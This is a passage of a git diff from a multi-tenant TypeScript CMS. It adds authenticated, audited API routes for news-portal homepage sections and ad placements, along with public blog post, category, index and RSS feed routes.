+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Ad placement is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const referenceValidation = await validateAdPlacementMediaReference(
+      tx,
+      tenantId,
+      input.mediaObjectId,
+      input.placementKey
+    );
+
+    if (!referenceValidation.valid) {
+      return fail(
+        422,
+        "AD_PLACEMENT_REFERENCE_INVALID",
+        "Ad placement references an invalid or inaccessible media object.",
+        {},
+        referenceValidation.errors
+      );
+    }
+
+    const placement = await createAdPlacement(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      input,
+      correlationId
+    );
+
+    log("info", "news-portal.ad_placement.created", {
+      correlationId,
+      tenantId,
+      moduleKey: "news_portal",
+      adPlacementId: placement.id
+    });
+
+    return ok(placement);
+  });
+};

--- a/src/pages/api/v1/news-portal/homepage-sections/[id].ts
+++ b/src/pages/api/v1/news-portal/homepage-sections/[id].ts
@@ -1,0 +1,245 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchHomepageSectionById,
+  softDeleteHomepageSection,
+  updateHomepageSection
+} from "../../../../../modules/news-portal/application/homepage-section-directory";
+import { validateHomepageSectionReferences } from "../../../../../modules/news-portal/application/homepage-section-reference-validation";
+import { publicContentPortAdapter } from "../../../../../modules/blog-content/application/public-content-port-adapter";
+import { validateUpdateHomepageSectionInput } from "../../../../../modules/news-portal/domain/homepage-section-policy";
+import { validateDeleteReasonInput } from "../../../../../modules/blog-content/domain/content-validation";
+
+const CONFIGURE_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "homepage_sections",
+  action: "configure" as const
+};
+
+/** `PATCH /api/v1/news-portal/homepage-sections/{id}` (Issue #637) — partial update; `sortOrder` is how an admin reorders sections (no separate bulk-reorder endpoint, same "just another patchable field" convention `widget-directory.ts`'s `updateWidget` uses). `sectionType` is immutable — see `homepage-section-policy.ts`. */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Homepage section id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody<Record<string, unknown>>(
+    request,
+    "large"
+  );
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const body = bodyRead.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchHomepageSectionById(tx, tenantId, id);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Homepage section not found.");
+    }
+
+    const validation = validateUpdateHomepageSectionInput(
+      body,
+      existing.sectionType
+    );
+
+    if (!validation.valid) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "Homepage section update is invalid.",
+        {},
+        validation.errors
+      );
+    }
+
+    const input = validation.value;
+
+    if (input.config) {
+      const referenceValidation = await validateHomepageSectionReferences(
+        tx,
+        tenantId,
+        existing.sectionType,
+        input.config,
+        publicContentPortAdapter
+      );
+
+      if (!referenceValidation.valid) {
+        return fail(
+          422,
+          "HOMEPAGE_SECTION_REFERENCE_INVALID",
+          "Homepage section references invalid or inaccessible content.",
+          {},
+          referenceValidation.errors
+        );
+      }
+    }
+
+    const updated = await updateHomepageSection(tx, tenantId, id, input);
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Homepage section not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "news_portal",
+      action: "news_portal.homepage_section.updated",
+      resourceType: "news_portal_homepage_section",
+      resourceId: id,
+      severity: "info",
+      message: `Homepage section updated: ${updated.sectionKey}.`,
+      correlationId
+    });
+
+    log("info", "news-portal.homepage_section.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "news_portal",
+      sectionId: id
+    });
+
+    return ok(updated);
+  });
+};
+
+/** `DELETE /api/v1/news-portal/homepage-sections/{id}` (Issue #637) — soft-delete. `reason` required, same convention every other soft-deletable resource in this repo uses. */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Homepage section id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateDeleteReasonInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchHomepageSectionById(tx, tenantId, id);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Homepage section not found.");
+    }
+
+    await softDeleteHomepageSection(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      id,
+      reason
+    );
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "news_portal",
+      action: "news_portal.homepage_section.deleted",
+      resourceType: "news_portal_homepage_section",
+      resourceId: id,
+      severity: "warning",
+      message: "Homepage section deleted.",
+      attributes: { reason },
+      correlationId
+    });
+
+    log("info", "news-portal.homepage_section.deleted", {
+      correlationId,
+      tenantId,
+      moduleKey: "news_portal",
+      sectionId: id
+    });
+
+    return ok({ id, deleted: true });
+  });
+};

--- a/src/pages/api/v1/news-portal/homepage-sections/index.ts
+++ b/src/pages/api/v1/news-portal/homepage-sections/index.ts
@@ -1,0 +1,184 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  createHomepageSection,
+  listHomepageSections
+} from "../../../../../modules/news-portal/application/homepage-section-directory";
+import { validateHomepageSectionReferences } from "../../../../../modules/news-portal/application/homepage-section-reference-validation";
+import { publicContentPortAdapter } from "../../../../../modules/blog-content/application/public-content-port-adapter";
+import { validateCreateHomepageSectionInput } from "../../../../../modules/news-portal/domain/homepage-section-policy";
+
+const READ_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "homepage_sections",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "homepage_sections",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/news-portal/homepage-sections` (Issue #637) — list this tenant's non-deleted homepage sections (admin view: includes disabled/out-of-schedule rows). */
+export const GET: APIRoute = async ({ request, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const sections = await listHomepageSections(tx, tenantId);
+
+    return ok({ sections });
+  });
+};
+
+/** `POST /api/v1/news-portal/homepage-sections` (Issue #637) — create a homepage section. `config` is validated for shape (domain layer) then for reference existence/tenant-ownership (`validateHomepageSectionReferences`) before the row is written — a request that fails either never creates a partially-written row. Not idempotent. */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody<Record<string, unknown>>(
+    request,
+    "large"
+  );
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const body = bodyRead.value;
+  const validation = validateCreateHomepageSectionInput(body);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Homepage section is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const referenceValidation = await validateHomepageSectionReferences(
+      tx,
+      tenantId,
+      input.sectionType,
+      input.config,
+      publicContentPortAdapter
+    );
+
+    if (!referenceValidation.valid) {
+      return fail(
+        422,
+        "HOMEPAGE_SECTION_REFERENCE_INVALID",
+        "Homepage section references invalid or inaccessible content.",
+        {},
+        referenceValidation.errors
+      );
+    }
+
+    let section;
+
+    try {
+      section = await createHomepageSection(tx, tenantId, input);
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (
+        message.includes("awcms_news_portal_homepage_sections_tenant_key_dedup")
+      ) {
+        return fail(
+          409,
+          "HOMEPAGE_SECTION_KEY_CONFLICT",
+          `sectionKey "${input.sectionKey}" is already in use.`
+        );
+      }
+
+      throw error;
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "news_portal",
+      action: "news_portal.homepage_section.created",
+      resourceType: "news_portal_homepage_section",
+      resourceId: section.id,
+      severity: "info",
+      message: `Homepage section created: ${section.sectionKey}.`,
+      correlationId
+    });
+
+    log("info", "news-portal.homepage_section.created", {
+      correlationId,
+      tenantId,
+      moduleKey: "news_portal",
+      sectionId: section.id
+    });
+
+    return ok(section);
+  });
+};

--- a/src/pages/blog/[tenantCode]/[slug].ts
+++ b/src/pages/blog/[tenantCode]/[slug].ts
@@ -1,0 +1,158 @@
+import type { APIRoute } from "astro";
+
+import { getDatabaseClient } from "../../../lib/database/client";
+import { withTenant } from "../../../lib/database/tenant-context";
+import { resolvePublicTenantByCode } from "../../../lib/tenant/public-tenant-resolver";
+import { escapeHtml } from "../../../lib/html/escape";
+import {
+  notFoundHtmlResponse,
+  serverErrorHtmlResponse
+} from "../../../lib/html/error-responses";
+import { log } from "../../../lib/logging/logger";
+import { fetchPublicBlogPostBySlug } from "../../../modules/blog-content/application/public-blog-directory";
+import { isLegacyTenantRouteEnabled } from "../../../modules/blog-content/application/public-route-settings";
+import { fetchBlogSettings } from "../../../modules/blog-content/application/blog-settings-directory";
+import { buildNewsArticleSeoMetadata } from "../../../modules/blog-content/application/news-article-seo-metadata";
+import { noopNewsMediaPortAdapter } from "../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { resolveBlogShareConfig } from "../../../modules/blog-content/domain/social-share-config";
+import { renderContentJsonToHtml } from "../../../modules/blog-content/domain/content-block-rendering";
+import { renderContentHtmlWithInternalTagLinks } from "../../../modules/blog-content/application/internal-tag-link-rendering";
+import {
+  resolveCanonicalUrl,
+  resolveMetaDescription,
+  resolveSeoTitle
+} from "../../../modules/blog-content/domain/seo-rendering";
+import { renderPublicPageShell } from "../../../modules/blog-content/domain/public-page-rendering";
+import { renderSocialShareButtonsHtml } from "../../../modules/blog-content/domain/social-share-links";
+
+const NEWS_SHARE_CLIENT_SCRIPT_SRC = "/js/news-share.js";
+
+/**
+ * `GET /blog/{tenantCode}/{slug}` (Issue #540) — public post detail.
+ * Reachable for `visibility IN ('public', 'unlisted')` (unlisted = direct
+ * link only, excluded from every listing surface — see
+ * `public-blog-directory.ts`'s doc comment); `private`, non-`published`,
+ * scheduled-future, and soft-deleted posts always 404. Issue #564: also
+ * 404s (same generic shape) when the tenant's `legacyTenantRouteEnabled`
+ * setting is `false`.
+ */
+export const GET: APIRoute = async ({ params, url }) => {
+  const tenantCode = params.tenantCode;
+  const slug = params.slug;
+
+  if (!tenantCode || !slug) {
+    return notFoundHtmlResponse();
+  }
+
+  try {
+    const sql = getDatabaseClient();
+    const tenant = await resolvePublicTenantByCode(sql, tenantCode);
+
+    if (!tenant) {
+      return notFoundHtmlResponse();
+    }
+
+    return await withTenant(sql, tenant.tenantId, async (tx) => {
+      if (!(await isLegacyTenantRouteEnabled(tx, tenant.tenantId))) {
+        return notFoundHtmlResponse();
+      }
+
+      const post = await fetchPublicBlogPostBySlug(tx, tenant.tenantId, slug);
+
+      if (!post) {
+        return notFoundHtmlResponse();
+      }
+
+      const selfUrl = `${url.origin}/blog/${tenantCode}/${post.slug}`;
+      const seoTitle = resolveSeoTitle(post);
+      const metaDescription = resolveMetaDescription(post);
+      const canonicalUrl = resolveCanonicalUrl(post, selfUrl);
+
+      // Issue #649 — see `/news/[slug].ts`'s identical comment: one shared
+      // orchestration builds every SEO/social preview metadata value from a
+      // single bulk media resolution, reusing Issue #636's exact
+      // R2-verification primitive rather than re-deriving it.
+      const blogSettings = await fetchBlogSettings(tx, tenant.tenantId);
+      const seoMetadata = await buildNewsArticleSeoMetadata(
+        tx,
+        tenant.tenantId,
+        noopNewsMediaPortAdapter,
+        blogSettings,
+        {
+          post,
+          tenantName: tenant.tenantName,
+          canonicalUrl,
+          seoTitle,
+          metaDescription
+        }
+      );
+
+      const renderedContentHtml = renderContentJsonToHtml(
+        post.contentJson,
+        seoMetadata.resolvedGalleryUrls
+      );
+
+      // Issue #641 — see `/news/[slug].ts`'s identical comment: pure
+      // render-time internal tag linking, never touching stored content.
+      const contentHtml = await renderContentHtmlWithInternalTagLinks(
+        tx,
+        tenant.tenantId,
+        renderedContentHtml,
+        post.autoInternalTagLinksDisabled,
+        `/blog/${tenantCode}`
+      );
+
+      // Issue #642 — see `/news/[slug].ts`'s identical comment: share
+      // buttons only for this already-gated public/published post, built
+      // from the resolved canonical URL only.
+      const shareButtonsHtml = canonicalUrl
+        ? renderSocialShareButtonsHtml(
+            { canonicalUrl, title: seoTitle, excerpt: metaDescription },
+            resolveBlogShareConfig(),
+            NEWS_SHARE_CLIENT_SCRIPT_SRC
+          )
+        : "";
+
+      const bodyHtml = `<article>
+  <h1>${escapeHtml(post.title)}</h1>
+  <p><time datetime="${post.publishedAt.toISOString()}">${escapeHtml(post.publishedAt.toDateString())}</time></p>
+  ${contentHtml}
+</article>
+${shareButtonsHtml}
+<p><a href="/blog/${escapeHtml(tenantCode)}">Back to blog</a></p>`;
+
+      const html = renderPublicPageShell({
+        title: seoTitle,
+        description: metaDescription,
+        canonicalUrl,
+        bodyHtml,
+        locale: post.locale,
+        ogImageUrl: seoMetadata.ogImageUrl,
+        ogImageAlt: seoMetadata.ogImageAlt,
+        ogImageMimeType: seoMetadata.ogImageMimeType,
+        ogImageWidth: seoMetadata.ogImageWidth,
+        ogImageHeight: seoMetadata.ogImageHeight,
+        siteName: tenant.tenantName,
+        ogType: "article",
+        articlePublishedTime: post.publishedAt.toISOString(),
+        articleModifiedTime: post.updatedAt.toISOString(),
+        articleSection: seoMetadata.articleSection,
+        articleTags: seoMetadata.articleTags,
+        robotsContent: seoMetadata.robotsContent,
+        structuredDataJsonLd: seoMetadata.structuredDataJsonLd
+      });
+
+      return new Response(html, {
+        status: 200,
+        headers: { "content-type": "text/html; charset=utf-8" }
+      });
+    });
+  } catch (error) {
+    log("error", "public_blog.detail.failed", {
+      tenantCode,
+      slug,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    return serverErrorHtmlResponse();
+  }
+};

--- a/src/pages/blog/[tenantCode]/[slug].ts
+++ b/src/pages/blog/[tenantCode]/[slug].ts
@@ -13,7 +13,7 @@ import { fetchPublicBlogPostBySlug } from "../../../modules/blog-content/applica
 import { isLegacyTenantRouteEnabled } from "../../../modules/blog-content/application/public-route-settings";
 import { fetchBlogSettings } from "../../../modules/blog-content/application/blog-settings-directory";
 import { buildNewsArticleSeoMetadata } from "../../../modules/blog-content/application/news-article-seo-metadata";
-import { noopNewsMediaPortAdapter } from "../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../modules/news-portal/application/news-media-port-adapter";
 import { resolveBlogShareConfig } from "../../../modules/blog-content/domain/social-share-config";
 import { renderContentJsonToHtml } from "../../../modules/blog-content/domain/content-block-rendering";
 import { renderContentHtmlWithInternalTagLinks } from "../../../modules/blog-content/application/internal-tag-link-rendering";
@@ -76,7 +76,7 @@ export const GET: APIRoute = async ({ params, url }) => {
       const seoMetadata = await buildNewsArticleSeoMetadata(
         tx,
         tenant.tenantId,
-        noopNewsMediaPortAdapter,
+        newsMediaPortAdapter,
         blogSettings,
         {
           post,

--- a/src/pages/blog/[tenantCode]/category/[slug].ts
+++ b/src/pages/blog/[tenantCode]/category/[slug].ts
@@ -1,0 +1,94 @@
+import type { APIRoute } from "astro";
+
+import { getDatabaseClient } from "../../../../lib/database/client";
+import { withTenant } from "../../../../lib/database/tenant-context";
+import { resolvePublicTenantByCode } from "../../../../lib/tenant/public-tenant-resolver";
+import { escapeHtml } from "../../../../lib/html/escape";
+import {
+  notFoundHtmlResponse,
+  serverErrorHtmlResponse
+} from "../../../../lib/html/error-responses";
+import { log } from "../../../../lib/logging/logger";
+import { parsePageParam } from "../../../../modules/_shared/offset-pagination";
+import {
+  fetchPublicTermBySlug,
+  listPublicBlogPostsByTermId
+} from "../../../../modules/blog-content/application/public-blog-directory";
+import { isLegacyTenantRouteEnabled } from "../../../../modules/blog-content/application/public-route-settings";
+import {
+  renderPaginationNavHtml,
+  renderPostSummaryListHtml,
+  renderPublicPageShell
+} from "../../../../modules/blog-content/domain/public-page-rendering";
+
+/** `GET /blog/{tenantCode}/category/{slug}` (Issue #540) — same listing predicate as the index, scoped to posts assigned this category. 404 for an unknown or soft-deleted category, or (Issue #564) when `legacyTenantRouteEnabled` is `false`. */
+export const GET: APIRoute = async ({ params, url }) => {
+  const tenantCode = params.tenantCode;
+  const slug = params.slug;
+
+  if (!tenantCode || !slug) {
+    return notFoundHtmlResponse();
+  }
+
+  try {
+    const sql = getDatabaseClient();
+    const tenant = await resolvePublicTenantByCode(sql, tenantCode);
+
+    if (!tenant) {
+      return notFoundHtmlResponse();
+    }
+
+    const page = parsePageParam(url.searchParams.get("page"));
+
+    return await withTenant(sql, tenant.tenantId, async (tx) => {
+      if (!(await isLegacyTenantRouteEnabled(tx, tenant.tenantId))) {
+        return notFoundHtmlResponse();
+      }
+
+      const term = await fetchPublicTermBySlug(
+        tx,
+        tenant.tenantId,
+        "category",
+        slug
+      );
+
+      if (!term) {
+        return notFoundHtmlResponse();
+      }
+
+      const result = await listPublicBlogPostsByTermId(
+        tx,
+        tenant.tenantId,
+        term.id,
+        {
+          page
+        }
+      );
+
+      const bodyHtml = `<h1>Category: ${escapeHtml(term.name)}</h1>
+<div class="posts">${renderPostSummaryListHtml(tenantCode, result.items, "No posts in this category yet.")}</div>
+${renderPaginationNavHtml(page, result.hasNextPage, `/blog/${tenantCode}/category/${term.slug}`)}`;
+
+      const html = renderPublicPageShell({
+        title: `${term.name} — ${tenant.tenantName} Blog`,
+        description:
+          term.description ?? `Posts categorized under ${term.name}.`,
+        canonicalUrl: `${url.origin}/blog/${tenantCode}/category/${term.slug}`,
+        bodyHtml,
+        locale: tenant.defaultLocale
+      });
+
+      return new Response(html, {
+        status: 200,
+        headers: { "content-type": "text/html; charset=utf-8" }
+      });
+    });
+  } catch (error) {
+    log("error", "public_blog.category.failed", {
+      tenantCode,
+      slug,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    return serverErrorHtmlResponse();
+  }
+};

--- a/src/pages/blog/[tenantCode]/feed.xml.ts
+++ b/src/pages/blog/[tenantCode]/feed.xml.ts
@@ -13,7 +13,7 @@ import { listPublicBlogPostsForFeed } from "../../../modules/blog-content/applic
 import { fetchBlogSettings } from "../../../modules/blog-content/application/blog-settings-directory";
 import { isLegacyTenantRouteEnabled } from "../../../modules/blog-content/application/public-route-settings";
 import { resolveNewsArticlePreviewImage } from "../../../modules/blog-content/application/news-article-seo-metadata";
-import { noopNewsMediaPortAdapter } from "../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../modules/news-portal/application/news-media-port-adapter";
 import { resolveMetaDescription } from "../../../modules/blog-content/domain/seo-rendering";
 
 /**
@@ -67,7 +67,7 @@ export const GET: APIRoute = async ({ params, url }) => {
         const previewImage = await resolveNewsArticlePreviewImage(
           tx,
           tenant.tenantId,
-          noopNewsMediaPortAdapter,
+          newsMediaPortAdapter,
           settings,
           post
         );

--- a/src/pages/blog/[tenantCode]/feed.xml.ts
+++ b/src/pages/blog/[tenantCode]/feed.xml.ts
@@ -1,0 +1,113 @@
+import type { APIRoute } from "astro";
+
+import { getDatabaseClient } from "../../../lib/database/client";
+import { withTenant } from "../../../lib/database/tenant-context";
+import { resolvePublicTenantByCode } from "../../../lib/tenant/public-tenant-resolver";
+import { escapeHtml } from "../../../lib/html/escape";
+import {
+  notFoundXmlResponse,
+  serverErrorXmlResponse
+} from "../../../lib/html/error-responses";
+import { log } from "../../../lib/logging/logger";
+import { listPublicBlogPostsForFeed } from "../../../modules/blog-content/application/public-blog-directory";
+import { fetchBlogSettings } from "../../../modules/blog-content/application/blog-settings-directory";
+import { isLegacyTenantRouteEnabled } from "../../../modules/blog-content/application/public-route-settings";
+import { resolveNewsArticlePreviewImage } from "../../../modules/blog-content/application/news-article-seo-metadata";
+import { noopNewsMediaPortAdapter } from "../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { resolveMetaDescription } from "../../../modules/blog-content/domain/seo-rendering";
+
+/**
+ * `GET /blog/{tenantCode}/feed.xml` (Issue #540) — RSS 2.0, only
+ * `published`+`public` posts (same predicate as the index/sitemap, doc
+ * issue #540 §RSS Requirements: excludes unlisted/private/archived/
+ * scheduled-future/draft/review/deleted). Hand-built XML string (no RSS
+ * library dependency — Bun-only, AGENTS.md rule 14), escaped through the
+ * same `escapeHtml` used for HTML (XML and HTML share the same five
+ * entity escapes). Issue #543 §Settings Page adds `rssEnabled` — a tenant
+ * that has turned the feed off gets the same 404 shape as an unknown
+ * tenant/post (no distinguishable signal for a disabled vs. nonexistent
+ * feed). Issue #564 adds the same generic 404 when the tenant's
+ * `legacyTenantRouteEnabled` setting is `false`.
+ */
+export const GET: APIRoute = async ({ params, url }) => {
+  const tenantCode = params.tenantCode;
+
+  if (!tenantCode) {
+    return notFoundXmlResponse();
+  }
+
+  try {
+    const sql = getDatabaseClient();
+    const tenant = await resolvePublicTenantByCode(sql, tenantCode);
+
+    if (!tenant) {
+      return notFoundXmlResponse();
+    }
+
+    return await withTenant(sql, tenant.tenantId, async (tx) => {
+      if (!(await isLegacyTenantRouteEnabled(tx, tenant.tenantId))) {
+        return notFoundXmlResponse();
+      }
+
+      const settings = await fetchBlogSettings(tx, tenant.tenantId);
+
+      if (!settings.rssEnabled) {
+        return notFoundXmlResponse();
+      }
+
+      const posts = await listPublicBlogPostsForFeed(tx, tenant.tenantId);
+      const channelLink = `${url.origin}/blog/${tenantCode}`;
+
+      // Issue #649 — see `/news/feed.xml.ts`'s identical comment: resolved
+      // sequentially, one query at a time on the shared transaction.
+      const itemParts: string[] = [];
+      for (const post of posts) {
+        const link = `${channelLink}/${post.slug}`;
+        const description = resolveMetaDescription(post);
+        const previewImage = await resolveNewsArticlePreviewImage(
+          tx,
+          tenant.tenantId,
+          noopNewsMediaPortAdapter,
+          settings,
+          post
+        );
+        const enclosure = previewImage
+          ? `<enclosure url="${escapeHtml(previewImage.url)}" length="${previewImage.sizeBytes ?? 0}" type="${escapeHtml(previewImage.mimeType)}" />`
+          : "";
+
+        itemParts.push(`<item>
+<title>${escapeHtml(post.title)}</title>
+<link>${escapeHtml(link)}</link>
+<guid isPermaLink="true">${escapeHtml(link)}</guid>
+<pubDate>${post.publishedAt.toUTCString()}</pubDate>
+<description>${escapeHtml(description)}</description>
+${enclosure}
+</item>`);
+      }
+
+      const items = itemParts.join("\n");
+
+      const xml = `<?xml version="1.0" encoding="UTF-8"?>
+<rss version="2.0">
+<channel>
+<title>${escapeHtml(tenant.tenantName)} Blog</title>
+<link>${escapeHtml(channelLink)}</link>
+<description>Latest posts from ${escapeHtml(tenant.tenantName)}.</description>
+<language>${escapeHtml(tenant.defaultLocale)}</language>
+${items}
+</channel>
+</rss>`;
+
+      return new Response(xml, {
+        status: 200,
+        headers: { "content-type": "application/rss+xml; charset=utf-8" }
+      });
+    });
+  } catch (error) {
+    log("error", "public_blog.feed.failed", {
+      tenantCode,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    return serverErrorXmlResponse();
+  }
+};

--- a/src/pages/blog/[tenantCode]/index.ts
+++ b/src/pages/blog/[tenantCode]/index.ts
@@ -1,0 +1,98 @@
+import type { APIRoute } from "astro";
+
+import { getDatabaseClient } from "../../../lib/database/client";
+import { withTenant } from "../../../lib/database/tenant-context";
+import { resolvePublicTenantByCode } from "../../../lib/tenant/public-tenant-resolver";
+import { escapeHtml } from "../../../lib/html/escape";
+import {
+  notFoundHtmlResponse,
+  serverErrorHtmlResponse
+} from "../../../lib/html/error-responses";
+import { log } from "../../../lib/logging/logger";
+import { parsePageParam } from "../../../modules/_shared/offset-pagination";
+import {
+  fetchPublicBlogSettings,
+  listPublicBlogPosts
+} from "../../../modules/blog-content/application/public-blog-directory";
+import { isLegacyTenantRouteEnabled } from "../../../modules/blog-content/application/public-route-settings";
+import {
+  renderPaginationNavHtml,
+  renderPostSummaryListHtml,
+  renderPublicPageShell
+} from "../../../modules/blog-content/domain/public-page-rendering";
+
+/**
+ * `GET /blog/{tenantCode}` (Issue #540) — public blog index, listing
+ * only `published`+`public` posts (never draft/review/scheduled-future/
+ * archived/private/unlisted/soft-deleted — doc issue #540 §Public
+ * Visibility Rule + the listing-only `visibility != 'unlisted'` rule).
+ *
+ * Implemented as a plain `.ts` `APIRoute` (hand-rendered HTML string),
+ * not a `.astro` page — deliberately, so it is testable through this
+ * repo's existing `tests/integration/harness.ts` `invoke()` pattern
+ * (built for `APIRoute` handlers, no existing convention for testing
+ * `.astro` output). See `src/modules/blog-content/README.md` §Public
+ * routes for the full reasoning.
+ *
+ * Issue #564 (epic #555): gated by the tenant's effective
+ * `legacyTenantRouteEnabled` setting (default `true` — today's behavior
+ * unchanged). `false` 404s this route the same generic way as an unknown
+ * `tenantCode`, applied consistently across all 7 `/blog/{tenantCode}`
+ * routes — see `src/modules/blog-content/README.md` §Public route
+ * settings.
+ */
+export const GET: APIRoute = async ({ params, url }) => {
+  const tenantCode = params.tenantCode;
+
+  if (!tenantCode) {
+    return notFoundHtmlResponse();
+  }
+
+  try {
+    const sql = getDatabaseClient();
+    const tenant = await resolvePublicTenantByCode(sql, tenantCode);
+
+    if (!tenant) {
+      return notFoundHtmlResponse();
+    }
+
+    const page = parsePageParam(url.searchParams.get("page"));
+
+    return await withTenant(sql, tenant.tenantId, async (tx) => {
+      if (!(await isLegacyTenantRouteEnabled(tx, tenant.tenantId))) {
+        return notFoundHtmlResponse();
+      }
+
+      const settings = await fetchPublicBlogSettings(tx, tenant.tenantId);
+      const result = await listPublicBlogPosts(tx, tenant.tenantId, {
+        page,
+        pageSize: settings.postsPerPage
+      });
+
